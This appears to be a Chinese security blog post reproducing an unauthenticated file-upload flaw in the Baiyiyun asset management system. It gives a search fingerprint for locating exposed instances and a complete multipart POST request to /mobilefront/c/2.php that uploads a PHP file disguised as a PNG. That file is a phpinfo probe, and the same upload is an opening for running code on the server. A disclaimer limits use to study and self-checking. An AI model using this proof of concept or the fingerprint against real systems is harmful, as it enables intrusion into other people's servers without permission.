【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传

漏洞描述

湖南众合百易信息技术有限公司(简称:百易云)成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统/mobilefront/c/2.php前台文件上传漏洞。

资产概要

复制代码
body="media/css/uniform.default.css" && body="资管云"

漏洞复现

复制代码
POST /mobilefront/c/2.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 35827

-----------------------------289666258334735365651210512949
Content-Disposition: form-data; name="file1"; filename="1.php"
Content-Type: image/png

<?php phpinfo();?>
-----------------------------289666258334735365651210512949--

免责声明

本文分享的漏洞POC及相关技术仅限学习和自查用途,请勿用于非法测试或其他不当行为。传播或利用本文及相关工具所导致的任何直接或间接后果,包括法律责任和不良影响,均由使用者自行承担,文章作者概不负责。如内容涉及侵权问题,请及时联系,作者将迅速处理并致以歉意。此外,工具来源于网络,安全性需用户自行验证。感谢您的理解与支持!

相关推荐
网安加云课堂4 分钟前
课程分享 | 软件供应链安全的系统工程
计算机网络·安全·网络安全
网络抓包与爬虫3 小时前
如何在Android studio用flutter开发app
websocket·网络协议·tcp/ip·http·网络安全·https·udp
色的归属感3 小时前
android studio 安装flutter插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
vortex55 小时前
如何为 Debian 和 Kali 系统更换软件源并更新系统
linux·运维·网络·网络安全·渗透测试·debian·kali
予安灵8 小时前
《白帽子讲 Web 安全》之跨站请求伪造
网络·安全·web安全·网络安全·csrf·跨站请求伪造
网络抓包与爬虫9 小时前
android应用崩溃了,通过崩溃手机连接电脑查找日志方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
iOS技术狂热者10 小时前
Flutter Mac上使用VSCode支持Flutter开发
websocket·网络协议·tcp/ip·http·网络安全·https·udp
黑客笔记13 小时前
在PyCharm 中免费集成Amazon CodeWhisperer
python·web安全·网络安全·pycharm
久违 °14 小时前
【安全运营】关于攻击面管理相关概念的梳理(二)
安全·web安全·网络安全
jingshaoyou14 小时前
【9】Strongswan collections —— enumerator
网络安全